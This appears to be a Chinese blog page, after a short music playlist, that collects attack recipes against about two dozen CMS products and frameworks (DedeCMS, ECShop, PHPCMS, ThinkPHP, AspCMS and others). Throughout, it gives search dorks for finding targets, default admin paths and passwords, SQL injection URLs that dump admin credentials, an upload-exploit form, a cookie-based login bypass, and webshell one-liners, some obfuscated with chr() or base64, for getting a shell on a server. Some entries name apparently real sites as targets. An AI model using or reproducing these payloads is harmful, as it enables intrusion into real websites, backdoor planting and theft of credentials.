音乐

  1. Fields Of Gold - Sting
  2. Beautiful Girl - INXS
  3. Take Me To Church - Hozier
  4. Stephanie Says - Lady & Bird
  5. All of Me - John Legend
  6. 一丝不挂 - 陈奕迅
PHPTalk2.0 新版全新上线,欢迎体验

常用CMS漏洞利用方法


【 动力3.5拿shell 】
    inurl:printpage.asp?ArticleID=

    1.找到版权信息,把内容替换成:

    版权所有 Copyright? 2003 <a href='http://www.asp163.net'>动力空间</a>" '版权信息

    if Request("xiaoxin")="520" then
    dim allen,creat,text,thisline,path
    if Request("creat")="yes" then
    Set fs = CreateObject("Scripting.FileSystemObject") 
    Set outfile=fs.CreateTextFile(server.mappath(Request("path")))
    outfile.WriteLine Request("text")
    Response.write "小新恭喜"
    end if
    Response.write "<form method='POST'action='"&Request.ServerVariables("URL")&"?xiaoxin=520&creat=yes'>"
    Response.write "<textarea name='text'>"&thisline&"</textarea><br>"
    Response.write "<input type='text' name='path' value='"&Request("path")&"'>"
    Response.write "<input name='submit' type='submit' value='ok' ></form>"
    Response.end
    end if 
    %> 

    2.然后保存,千万别跳转任何页面,直接在IE地址栏内将 admin/Admin_Login.asp 替换成 inc/config.asp?xiaoxin=520

    3.成功后会进入一个像小马一样的页面,粘贴木马代码以及写上木马文件名即可拿到wshell,木马在inc目录。

    =============================================================================================================================================================
【 动易cms拿shell 】
    点击网站配置,在网站名称后面插入一句话木马,连接inc/config.asp

    ============================================================================================================================================================
【 aspcms】
    简要描述:后台文件AspCms_AboutEdit.asp 未进行验证,且未过滤,导致SQL注入。

    爆帐号密码:
    admin/_content/_About/AspCms_AboutEdit.asp?id=1 and 1=2 union select 1,2,3,4,5,loginname,7,8,9,password,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35 from aspcms_user where userid=1

    版本不同需要更改值。

    第二种方法,找到后台,然后/admin/_system/AspCms_SiteSetting.asp?action=saves

    直接POST
    [php]runMode=1&siteMode=1&siteHelp=%B1%BE%CD%F8%D5%BE%D2%F2%B3%CC%D0%F2%C9%FD%BC%B6%B9%D8%B1%D5%D6%D0

    &SwitchComments=1&SwitchCommentsStatus=1&switchFaq=0:Y=request(chr(35)):execute(Y)&SwitchFaqStatus=0&dirtyStr=&waterMark=1&

    waterMarkFont=hahahaha&waterMarkLocation=1&smtp_usermail=aspcmstest%40163.com&smtp_user=aspcmstest&smtp_password=aspcms.cn

    &smtp_server=smtp.163.com&MessageAlertsEmail=13322712%40qq.com&messageReminded=1&orderReminded=1&applyReminded=1&commentReminded=1

    &LanguageID=1[/php]

    再连接配置文件config.asp 密码为#


    老版本中可以通过添加模板直接添加asp.但是新版已经限制了添加模板的格式为html,js,css

    当然如果是遇到iis6的话还是可以通过iis6的解析漏洞把文件名改成1.asp;.html这样的格式来拿到shell的.

    方法:点击“界面风格”,然后选“编辑模板/CSS文件”,然后“添加模板”,文件名称写error.asp;.html,文件内容写一句话<%eval request(“g”)%>

    然后添加,会提示添加成功,然后在模板列表中就可以找到我们添加的一句话了,用菜刀连接即可! 

    可是如果遇到iis7.5呢? 以下是本人自己找到挖掘到的aspcms通杀版本的后台拿shell方法.

    1、进入后台,“扩展功能”--“幻灯片设置”--”幻灯样式”

    2、使用chorme的审查元素功能或者firefox的firebug,总之使用能修改当前页面元素的工具就好了,将对应的slidestyle的value的值修改为1%><%Eval(Request (chr(65)))%><%

    3、一句话木马,密码a。在/config/AspCms_Config.asp

    =============================================================================================================================================================
【 XYCMS企业建站系统 】
    关键词:inurl:showkbxx.asp?id=

    默认数据库:data/xy#!123.mdb

    默认账户密码:admin admin

    找到网站配置,在网站名称里面直接插入一句话:网站"%><%eval request("x")%><%',注意不要删掉网站名称!然后中国菜刀连接:/inc/config.asp

    或是找到网站地址,在http://后面加上一句话木马,然后菜刀链接配置文件:inc/config.asp

    =============================================================================================================================================================
【 szwyadmin漏洞绕过后台验证 】
    关键字:inurl:szwyadmin/login.asp

    javascript:alert(document.cookie="adminuser="+escape("'or'='or'"));javascript:alert(document.cookie="adminpass="+escape("'or'='or'"));javascript:alert(document.cookie="admindj="+escape("1"));

    1.后台一般存在一个szwyadmin文件夹,复制一下后台地址放在一边,之后复制代码替换后台地址访问进行注射!

    2.这时会弹出一个窗口,连续点击三次确定。

    3.重新访问后台地址,把网站后面的/login.asp 换成 admin_index.asp 奇迹般的直接进入后台了!

    =============================================================================================================================================================
【 医院建站系统任意文件上传漏洞 】
    关键词:inurl:cms/Column.aspx?
    关键词:inurl:cms/Column.aspx?LMID=

    漏洞利用 :xtwh/upfile.aspx

    直接上传aspx木马拿shell。

    =============================================================================================================================================================
【 Struts 2远程执行命令漏洞 】
    struts 2一种java-web的MVC框架技术,和传统的struts1有很大的改进。

    严格来说,这其实是XWork的漏洞,因为Struts 2的核心使用的是WebWork,而WebWork又是使用XWork来处理action的。

    关键词:inurl:common/common_info.action?wid=

    http://www.xxxxx.com/xxx.action 一般页面以.action结尾的几乎都存在这个漏洞,可以用工具检测一下就知道了。

    这个漏洞是在Java运行环境下利用的,Java运行环境下载地址:http://www.orsoon.com/Soft/12080.html

    =============================================================================================================================================================
【 嘉友科技cms上传漏洞 】
    谷歌关键字:inurl:newslist.asp?NodeCode=

    程序采用的上传页uploadfile.asp未进行管理验证,导致建立畸形目录上传图片木马获取shell漏洞。

    exp:ploadfile.asp?uppath=mad.asp&upname=&uptext=form1.mad.asp

    他原上传目录是:uploadfile.asp?uppath=PicPath&upname=&uptext=form1.PicPath

    而且他的上传文件没有过滤导致未授权访问,直接上传小马,然后小马后面写为1.jpg  访问路径 查看源代码。

    =============================================================================================================================================================
【 ecshopcms后台拿shell 】
    支持最新2.7.2版本,通杀最新版本后台低权限!

    <?php $filen=chr(46).chr(46).chr(47).chr(110).chr(117).chr(108).chr(108).chr(46).chr(112).chr(104).chr(112); $filec=chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(117).chr(115).chr(98).chr(93).chr(41).chr(59).chr(63).chr(62); $a=chr(119); [email protected]($filen,$a); [email protected]($fp,$filec); if($msg) echo chr(79).chr(75).chr(33); @fclose($fp); ?>

    后台-订单管理-订单打印-选择源代码编辑-保存-返回订单列表,随意选择一个订单打印,返回OK,生成一句话成功-在根目录生成了一个null.php,一句话密码:usb

    =============================================================================================================================================================
【 phpcms2008版本 直接执行php代码漏洞 】
    关键字:inurl:yp/product.php

    exp代码:pagesize=${${@eval_r($_POST[cmd])}}

    测试网站:http://www.slsdgc.com.cn/yp/product.php?catid=721

    利用方法:http://www.slsdgc.com.cn/yp/product.php?pagesize=${${@eval_r($_POST[cmd])}}

    菜刀连接:http://www.slsdgc.com.cn/yp/product.php?pagesize=${${@eval_r($_POST[cmd])}}  密码cmd

    菜刀连接注意以下格式:

       默认级别                    php                       gb2312

    =============================================================================================================================================================
【 教育站sql注入通杀0day 】
    关键词:inurl:info_Print.asp?ArticleID=

    默认后台:website/ad_login.asp

    比如:http://www.psfshl.pudong-edu.sh.asp?ArticleID=1650

    加上:union select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin

    这样就直接得到了管理员账户和经过Md5加密的密码了。

    =============================================================================================================================================================
【 IIS7.0 畸形解析漏洞通杀oday 】
    找到某个使用IIS7.0架设的站,然后找到其中的图片上传点(不需要管理权限,普通注册用户即可搞定),把PHP一句话图片木马缀改成.jpg,传上去,得到图片地址。

    在图片格式后面添加xx.php xx随便你怎么填,只要后缀为.php就好,之后菜刀连接即可!

    =============================================================================================================================================================
【 Yothcms 遍历目录漏洞 】
    优斯科技企业网站管理系统(YothCMS)是一款完全开源免费的CMS。

    默认后台:admin/login.asp

    遍历目录:ewebeditor/manage/upload.asp?id=1&dir=../

    数据库路径:%23da%23ta%23\%23db_%23data%23%23.asa

    =============================================================================================================================================================
【 传信网络独立开发网站源码0day漏洞 】
    默认后台:system/login.asp

    编辑器后台路径:ubbcode/admin_login.asp

    数据库路径:ubbcode/db/ewebeditor.mdb

    默认账号密码:yzm   111111

    =============================================================================================================================================================
【 科讯cms 6.5后台拿shell 】
    1.可以在数据库备份中找到网站的绝对路径 

    2.利用科讯SQL注入漏洞利用工具也能找到

    进入后台后执行sql命令:
    create table E:\wenxiushi\wz001\\KS_Data\Collect\KS_Collect.Mdb.cmd  (a varchar(50))
    insert into E:\wenxiushi\wz001\KS_Data\Collect\KS_Collect.Mdb.cmd  (a) values ('┼攠數畣整爠煥敵瑳∨∣┩愾') 

    接着数据库备份成1.asp  菜刀连接密码:# 

    =============================================================================================================================================================
【 动易2006后台拿shell 】
    进入后台后,我们在左边菜单栏中选择“系统设置”,然后在出现的菜单栏里选择“自定义页面管理”,

    接着需要先添加一个自定义页面分类,选择“添加自定义分类”这个选项,分类名称与分类简介都可以随便填写。填写完毕后选择“添加”,系统提示添加成功。

    下面再来选择“添加自定义页面”,“页面名称”随便输入,“所属分类”就是刚才建立的分类就可以了。“页面类型”和“页面路径”都不用管,保持默认.

    不过如果没有改页面路径的话,默认生成的文件是在根目录下的,也就是http://www.xx.com/maer.asp.“文件名称”即输入生成的木马的文件名。

    “页面简介”也不用管,下面就是页面内容了。这里填入小马的代码。一切完毕点击“添加”会提示保存自定义页面成功。最后一步是要生成我们的木马页面。

    选择“自定义页面管理首页”,点击右边出现的“生成本页”就OK 了,成功获得动易的shell。

    =============================================================================================================================================================
【 Shopex4.8.5 注入漏洞后台拿shell 】
    关键词:powered by shopex v4.8.5

    exp:

    <html>  

    <head>  

    <title>Shopex 4.8.5 SQL Injection Exp</title>  

    </head>  

    <body>  

    <h2>Shopex 4.8.5 SQL Injection Exp (product-gnotify)</h2>  

    <form action="http://www.lpboke.com/?product-gnotify" method="post" name="submit_url">  

            <input type="hidden" name="goods[goods_id]" value="3">  

            <input type="hidden" name="goods[product_id]" value="1 and 1=2 union select 1,2,3,4,5,6,7,8,concat(0x245E,username,0x2D3E,userpass,0x5E24),10,11,12,13,14,15,16,17,18,19,20,21,22 from sdb_operators">  

            <input type="submit" value="">  

    </form>  

    fuck

    <body>  

    </html>  

    保存为html格式,替换代码中的网站,本地打开后点击小图标,出现新页面,帐号密码爆出来了,默认后台:shopadmin

    拿shell方法….

    第一步 页面管理 修改模版 然后选一个XML编辑

    开始用 live http 抓包 你们懂的 然后把第一个POST包给抓出来

    然后改包 id=1273923028-info.xml&tmpid=1273923028&name=index_temp.php&file_source=

    解释一下 id是你选择的模版文件夹名称 后面的info.xml 是你修改的XML文件 tmpid= 你们懂的 就是模版文件夹 然后 name 是你提交的文件名字 file_source 是后门或者shel

    我这里是一句话 你们懂的 然后提交了之后 地址是这样的http://Madman.in/themes/文件名称/你的木马名称

    ============================================================================================================================================================
【 ecshop漏洞总汇 】
    关键字:powered by ecshop

    普通代码:user.php?act=order_query&order_sn=' union select 1,2,3,4,5,6,concat(user_name,0x7c,password,0x7c,email),8 from ecs_admin_user/*

    变种代码:search.php?encode=YToxOntzOjQ6ImF0dHIiO2E6MTp7czoxMjU6IjEnKSBhbmQgMT0yIEdST1VQIEJZIGdvb2RzX2lkIHVuaW9uIGFsbCBzZWxlY3QgY29uY2F0KHVzZXJfbmFtZSwweDNhLHBhc3N3b3JkLCciXCcpIHVuaW9uIHNlbGVjdCAxIyInKSwxIGZyb20gZWNzX2FkbWluX3VzZXIjIjtzOjE6IjEiO319

    直接在网站后台加入代码回车就能爆出帐号密码,再去掉代码加上/admin回车就能直接进后台了。

    拿shell方法很简单,找到“库项目管理”再选择“配送的方式”,在代码最下面插入php一句话木马:<?php eval($_POST[x]);?> 不行就换php木马的预代码!

    接着保存,一句话路径是:http://www.xxx.org/myship.php  打开“ASP+PHP两用Shell.html”填入地址,点击一下环境变量,成功之后点击上传文件就可以拿shell了。

    =============================================================================================================================================================
【 ESPCMS通杀0day 】
    关键字:inurl:index.php?ac=article&at=read&did=

    默认后台:adminsoft/index.php 或者 admin/

    注入点(爆表前缀,比如:cm_admin......前缀就是cm,后面3个代码要自行替换):

    index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,table_name,0x27,0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23

    爆用户名:

    index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,username,0x27,0x7e)) from 前缀_admin_member limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23

    爆密码:

    index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,password,0x27,0x7e)) from 前缀_admin_member limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23

    密码和用户一次性爆:

    index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,username,0x27,password)) from 前缀_admin_member limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23

    拿shell:

    进到后台后,直接点击分类图片===修改==选择文件===直接上传一句话木马

    PS:
    当上传不了php网马时,去系统设置一下,添加图片上传格式 |php 这样就可以上传一个图片文件头的网马。

    =============================================================================================================================================================
【 帝国cms 6.6最新版本 】
    自定义页面-增加自定义页面-随便写个.php文件名,内容写:<script language="php">echo base64_decode("PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Pz4=");</script>

    如果内容直接添一句话或者php大马是无用的,因为他会生成xxx.php前先给你执行,

    PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Pz4=  就是 <?php @eval($_POST['cmd']);?> 的base64加密。

    所以生成xxx.php后 会出现内容 <?php @eval($_POST['cmd']);?> 在文件里,然后用菜刀直接连接吧。

    =============================================================================================================================================================
【 phpweb 】
    关键字:inurl:down/class/index.php?myord=

    后台地址:admin.php

    万能密码:admin 'or '1'='1

    注入地址:down/class/index.php?myord=1

    表段:pwn_base_admin

    拿shell通杀漏洞:登入后台--文章--文章发布--文章内容里的图片上传按钮--抓包之后改包NC提交。

    也可以用下面的exp拿shell:

    用火狐浏览器登录后台,因为火狐浏览器有保留cookies的功能, 找到“phpweb之exp”这个html,拉进火狐浏览器器里上传1.php;.jpg的一句话木马,查看源码菜刀连接!

    =============================================================================================================================================================
【 动科(dkcms)漏洞分析 】
    官方网站:www.dkcms.com

    主要是差不多3个版本为主吧,

    V2.0   data/dkcm_ssdfhwejkfs.mdb

    V3.1   _data/___dkcms_30_free.mdb

    V4.2   _data/I^(()UU()H.mdb

    默认后台:admin

    编辑器:admin/fckeditor

    由此可见,官方安全意识挺差的,至于后台拿shell,fck编辑器突破可拿shell

    建立asp文件夹

    Fck的路径:Admin/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/mk.asp&NewFolderName=mk.asp

    =============================================================================================================================================================
【 ESPCMS通杀0day 】
    百度关键字:inurl:index.php?ac=article&at=read&did=

    默认后台:adminsoft/index.php

    注入点(爆表前缀):index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,table_name,0x27,0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23

    爆帐号:index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,username,0x27,0x7e)) from 前缀_admin_member limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23

    爆密码:index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,password,0x27,0x7e)) from 前缀_admin_member limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23

    帐号和密码一次性爆:index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,username,0x27,password)) from 前缀_admin_member limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23

    进到后台后,直接点击分类图片-修改-选择文件-直接上传php一句话木马

    PS:当上传不了php木马时,去系统设置一下,添加图片上传格式 |php ,这样就可以上传一个图片文件头的php木马。

    =============================================================================================================================================================
【 Thinkphp框架任意代码执行漏洞 】
    ThinkPHP是一款国内使用比较广泛的老牌PHP MVC框架,官方已经发布修复漏洞的补丁,地址:http://thinkphp.cn/down-116.html

    关键字:thinkphp intitle:系统发生错误

    获取Thinkphp的版本号:index.php/module/action/param1/$%[email protected](THINK_VERSION)%7D

    获取服务器的配置信息:index.php/module/aciton/param1/${@phpinfo()}

    列出网站所有文件列表:index.php/module/action/param1/{${system($_GET['x'])}}?x=ls -al

    直接在网页执行一句话:index.php/module/action/param1/{${eval($_POST)}}  

    菜刀连接:http://www.xxx.com/index.php/module/action/param1/{${eval($_POST)}}   密码:s

    =============================================================================================================================================================
【 良精系统 】
    ( 爆管理员帐号密码的代码 )

    NewsType.asp?SmallClass='%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin%20union%20select%20*%20from%20news%20where%201=2%20and%20''='

    ( 一句话木马的妙用 )

    插入一句话木马后,连接网站的配置文件:inc/config.asp 密码都是g

    1.网站配置-允许的上传文件类型-插入闭合的一句话木马:"%><%eval request("g")%><%s="  不行就增加一个cer格式,之后上传cer格式的木马即可

    2.网站配置-网站地址-插入闭合的一句话木马:http://"%><%execute(request("g"))%><%'

    3.网站配置-网站名称-插入闭合的一句话木马:沧州临港彩越化工有限公司"%><%eval request("g")%><%s="

    4.网站配置-版权信息-插入闭合的一句话木马:"%><%eval(request(chr(103)))%><%'

    5.本方法适用于access数据库,只要在access数据库任何地方插入:┼攠數畣整爠煥敵瑳∨≡┩> 再将mdb备份成asp或者asa,访问这个asp或asa,就是一句话木马。

    ( 利用upfile_other.asp漏洞拿shell )

    直接访问会员中心:userreg.asp

    注册一个用户并在未退出登录的状态下,使用双文件上传工具足以爆它菊花,以下代码保存为1.html,并里面的修改目标站,第一个上传jpg,第二个上传cer

    <HTML><HEAD> <META http-equiv=Content-Type content="text/html; charset=gb2312"> <STYLE type=text/css>BODY { FONT-SIZE: 9pt; BACKGROUND-COLOR: #e1f4ee } .tx1 { BORDER-RIGHT: #000000 1px solid; BORDER-TOP: #000000 1px solid; FONT-SIZE: 9pt; BORDER-LEFT: #000000 1px solid; COLOR: #0000ff; BORDER-BOTTOM: #000000 1px solid; HEIGHT: 20px } </STYLE>
    <META content="MSHTML 6.00.2800.1400" name=GENERATOR></HEAD> <BODY leftMargin=0 topMargin=0> <FORM name=form1 action="http://www.xxx.com/upfile_other.asp"; method=post encType=multipart/form-data><INPUT class=tx1 type=file size=30 name=FileName> <INPUT class=tx1 type=file size=30 name=FileName1> <INPUT style="BORDER-RIGHT: rgb(88,88,88) 1px double; BORDER-TOP: rgb(88,88,88) 1px double; FONT-WEIGHT: normal; FONT-SIZE: 9pt; BORDER-LEFT: rgb(88,88,88) 1px double; LINE-HEIGHT: normal; BORDER-BOTTOM: rgb(88,88,88) 1px double; FONT-STYLE: normal; FONT-VARIANT: normal" type=submit value=上传 name=Submit> <INPUT id=PhotoUrlID type=hidden value=0 name=PhotoUrlID> </FORM></BODY></HTML>

    另外可以利用会员中心的cookies,用火狐浏览器登陆之后,访问upfile_other.asp页面,用抓包工具去抓包,接着用明小子上传拿shell.

    ( 上传漏洞 )

    漏洞文件:Upfile_Photo.asp

    前提是进入后台了,访问这个文件,将提示“请先选择你要上传的文件!”,用抓包工具抓管理员的cookies,再把上传地址跟cookies扔到名小子里上传拿shell

    ( 南方在线编辑器 )

    默认后台:admin/Southidceditor/admin_style.asp

    数据库路径:admin/SouthidcEditor\Datas\SouthidcEditor.mdb

    遍历目录:admin/Southidceditor/admin_uploadfile.asp?id=14&dir=../..

    文件上传页面:admin/Southidceditor/ewebeditor.asp?id=57&style=southidc

    样式设置页面:admin/SouthidcEditor/Admin_Style.asp?action=styleset&id=47

    =============================================================================================================================================================
【 dedecms最新注入漏洞及找后台技巧 】
    访问这个:plus/search.php?keyword=as&typeArr[ uNion ]=a

    看结果如果提示:Safe Alert: Request Error step 1 !

    那么直接用下面的exp爆出所有管理员的帐号密码:
    plus/search.php?keyword=as&typeArr[111%[email protected]`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%[email protected]__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%[email protected]`\'`+]=a

    看结果如果提示:Safe Alert: Request Error step 2 !

    那么直接用下面的exp爆出所有管理员的帐号密码:  a198654
    plus/search.php?keyword=as&typeArr[111%[email protected]`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%[email protected]__admin`%[email protected]`\'`+]=a

    有些/plus/目录换成了/plugins/目录,这时就要把/plus/换成/plugins/进行注射了

    破解出md5为20位结果,只需要把前三位和后一位去掉,剩余16位拿去解密即可

    如何找后台?

    默认后台:dede

    第一种方法:data/mysql_error_trace.inc (有时可以爆出路径)

    第二种方法:把域名作为后台去尝试

    第三种方法:查看这个文件:robots.txt

    第四种方法:ping下域名获得ip之后,http://www.bing.com/ 搜索:ip:127.0.0.1 php (可能获得后台也可以获得其他旁注站,一般dede的旁站很多也是dedecms的) 

    =============================================================================================================================================================
【 PHPcms V9 爆数据库信息漏洞】
    直接爆出数据库连接信息:/index.php?m=search&c=index&a=public_get_suggest_keyword&url=asdf&q=../../phpsso_server/caches/configs/database.php


    关于后台拿webshell:进入后台后点击界面--模版风格--随便找个页面点击修改,插入我们的一句话代码

    <?

    $fp = @fopen("0day.php", 'a');

    @fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[0day])'."\r\n\r\n?".">\r\n");

    点击保存,接着点击可视化,代码就成功执行了,接着菜刀连接/0day.php,密码0day


    =============================================================================================================================================================